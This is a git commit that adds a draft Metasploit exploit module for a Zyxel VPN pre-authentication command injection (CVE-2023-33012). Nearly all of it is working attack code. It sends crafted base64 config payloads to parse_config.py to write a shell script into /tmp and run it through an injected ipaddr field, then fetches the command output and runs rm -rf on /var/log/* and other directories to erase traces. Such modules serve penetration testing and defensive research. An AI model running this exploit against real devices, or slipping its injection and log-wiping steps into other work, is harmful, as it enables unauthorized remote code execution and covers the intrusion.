beta commit

jheysel-r7 · jheysel-r7 · commit 576191b34f53 · 2024-05-10T09:01:58.000-07:00
diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Zyxel parse_config.py Command Injection',
+        'Description' => %q(
+          This here module exploits Zyxel
+        ),
+        'Author'      =>
+          [
+            'SSD Secure Disclosure technical team', # discovery
+            'jheysel-r7'  # module
+          ],
+        'References'  =>
+          [
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
+            [ 'CVE', '2023-33012']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => true,
+        'Arch'           => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '',
+        'Notes'           =>
+		  {
+		    'Stability'   => [ CRASH_SAFE, ],
+		    'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+		    'Reliability' => [ REPEATABLE_SESSION, ],
+		  },
+      )
+    )
+
+    # register_options(
+    #   [
+    #
+    #   ],
+    # )
+  end
+
+  # def fingerprint_method1
+  #
+  # end
+  #
+  # def fingerprint_method2
+  #
+  # end
+
+  def check
+    res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js'),
+                           })
+    return CheckCode::Unknown if res.nil?
+
+    if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
+      return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # Command injection has a  0x14 byte length limit so keep the file name smol.
+    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection. #
+    filename = rand_text_alpha(1)
+
+    command = payload.encoded
+    command += <<-CMD
+2>/var/log/ztplog 1>/var/log/ztplog
+(sleep 10 && /bin/rm -rf /tmp/#{filename}.qsr /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+    CMD
+    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > /tmp/#{filename}.qsr ; . /tmp/#{filename}.qsr"
+
+    file_write_pload = "option proto vti\n"
+    file_write_pload += "option #{command};exit\n"
+    file_write_pload += "option name 1\n"
+
+    config = Base64.strict_encode64(file_write_pload)
+    data = { "config" => config, "fqdn" => "\x00" }
+    print_status('Attempting to upload the payload via QSR file write...')
+
+    file_write_res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+                             'data' => data.to_s,
+                           })
+    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
+    register_files_for_cleanup("/tmp/#{filename}.qsr")
+    print_good('File write was successful.')
+
+    cmd_injection_pload  = "option proto gre\n"
+    cmd_injection_pload += "option name 0\n"
+    cmd_injection_pload += "option ipaddr ;. /tmp/#{filename}.qsr;\n"
+    cmd_injection_pload += "option netmask 24\n"
+    cmd_injection_pload += "option gateway 0\n"
+    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
+    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"
+    config = Rex::Text.encode_base64(cmd_injection_pload)
+    data = { "config" => config, "fqdn" => "\x00" }
+
+    cmd_injection_res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+                             'data' => data.to_s,
+                           })
+
+    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
+
+    #Unecessary if running a fetch payload though adding for testing
+    cmd_ouput_res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py'),
+                           })
+
+    output = cmd_ouput_res.body.split("</head>\n<body>")[1]
+    output = output.split("</body>\n</html>")[0]
+    output = output.gsub("\n\n<br>", "")
+    output = output.gsub("[IPC]IPC result: 1\n", "")
+    print_good("Command output: #{output}" )
+
+  end
+end
